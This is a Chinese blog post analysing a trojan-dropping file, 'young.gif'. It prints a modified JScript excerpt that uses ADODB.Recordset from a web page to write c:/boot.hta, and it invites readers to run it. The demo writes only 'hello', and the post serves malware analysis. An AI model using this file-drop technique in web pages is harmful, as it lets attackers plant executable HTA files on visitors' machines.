首页 > 其他分享 >利用ADODB写文件——恶意文件young.gif代码的分析心得1

利用ADODB写文件——恶意文件young.gif代码的分析心得1

时间:2022-12-08 15:00:49浏览次数:40  
标签:文件 hta boot young gif ADODB Rfuc1k1S


purpleendurer 原创

2006-04-08 第1

对 ​​发现一个使用技术升级、下载灰鸽子的网站​​ 中的恶意文件young.gif进行了分析和注释,收获颇多。其一便是利用ADODB写文件。

下面的代码是从young.gif中截取、修改的,用来写入文件c:/boot.hta。



<html>


<HEAD></HEAD>


</HTML>


<SCRIPT language=JScript>


try


{


 var strHello = "hello";


 //利用ADODB写文件


 Rfuc1k1S=new ActiveXObject("ADODB.Recordset");


 Rfuc1k1S.Fields.Append("love", 200, 3000);


 mike=1;


 Rfuc1k1S.Open();


 mike=1;


 Rfuc1k1S.AddNew();


 mike=1;


 Rfuc1k1S.Fields("love").Value = strHello;


}


catch(e)


{}

 Rfuc1k1S.Update();

try
{
 Rfuc1k1S.Save("c://boot.hta" ,0); //保存为c:/boot.hta
}
catch(e)
{}
</SCRIPT>
</BODY>
</HTML>

 


把它复制/粘贴到记事本里,保存为HTM文件,双击运行。

看看c:/boot.hta是否出来了?

标签:文件,hta,boot,young,gif,ADODB,Rfuc1k1S
From: https://blog.51cto.com/endurer/5921726

相关文章

  • 推一款懒人听书导出神器(文件导出、会员下载音频导出来、导出mp3、导出本地)
    划重点: 下面这款懒人听书导出神器,可以将音频(文件导出、会员下载音频导出来、导出mp3、导出本地)。 懒人听书文件导出本地工具: ​​windows电脑版:​​​​https://jscs.lan......
  • 【适合小白教程】将喜马拉雅下载的xm文件转换为其他音频格式!
    喜马拉雅下载的音频文件格式为XM,想转换为mp3或者其他音频格式。XM加密的目前没有办法 不过可以用IDM在网页直接下载不过就是非常慢点一集一集的下 以前有个软件不过......
  • java 大文件分片上传处理
    ​ 我们平时经常做的是上传文件,上传文件夹与上传文件类似,但也有一些不同之处,这次做了上传文件夹就记录下以备后用。这次项目的需求:支持大文件的上传和续传,要求续传支持......
  • pycharm .ignore文件配置
    一、下载.ignore插件路径:Files->setting->Plugins,搜索ignore  安装完成后,右键项目根目录,新建.gitignoreFile(Git)文件  选择Exampleusertemplate并创建文件......
  • iOS APP上架App Store其中一个步骤就是要把ipa文件上传到App Store!​
    ​下面进行步骤介绍!​利用Appuploader这个软件,可以在Windows、Linux或Mac系统中申请ios和上传IPA到AppStoreConnect。​非常的方便,没有Mac也可以用Appuploader在Windows电......
  • iOS APP上架App Store其中一个步骤就是要把ipa文件上传到App Store!​
     下面进行步骤介绍!​利用Appuploader这个软件,可以在Windows、Linux或Mac系统中申请ios和上传IPA到AppStoreConnect。​ 非常的方便,没有Mac也可以用Appuploader在Wi......
  • Lua文件加载
    XLua只是提供Lua在Unity上运行,并没有提供热更行解决方案。Lua文件加载加载字符串直接使用luaEnv.DoString()执行一个字符串,字符串必须符合Lua语法但加载字符串这个方......
  • Python实验报告——第10章 文件及目录操作
    实例01:创建并打开记录蚂蚁庄园动态的文件 在IDLE中创建一个名称为antmanor_message.py的文件,然后在该文件中,首先输出一条提示信息,然后再调用open()函数创建或打开......
  • File Support—文件支持
    Spring集成的文件支持扩展了Spring集成核心,具有专用词汇来处理读取、写入和转换文件。您需要将此依赖项包含在项目中:<dependency><groupId>org.springframework.inte......
  • (转)ext4文件系统新特性
    http://linux.chinaunix.net/bbs/thread-1059437-1-1.htmlExt4是内核版本2.6.28的重要部分。介绍Ext4是Linux文件系统的一次革命。在很多方面,Ex......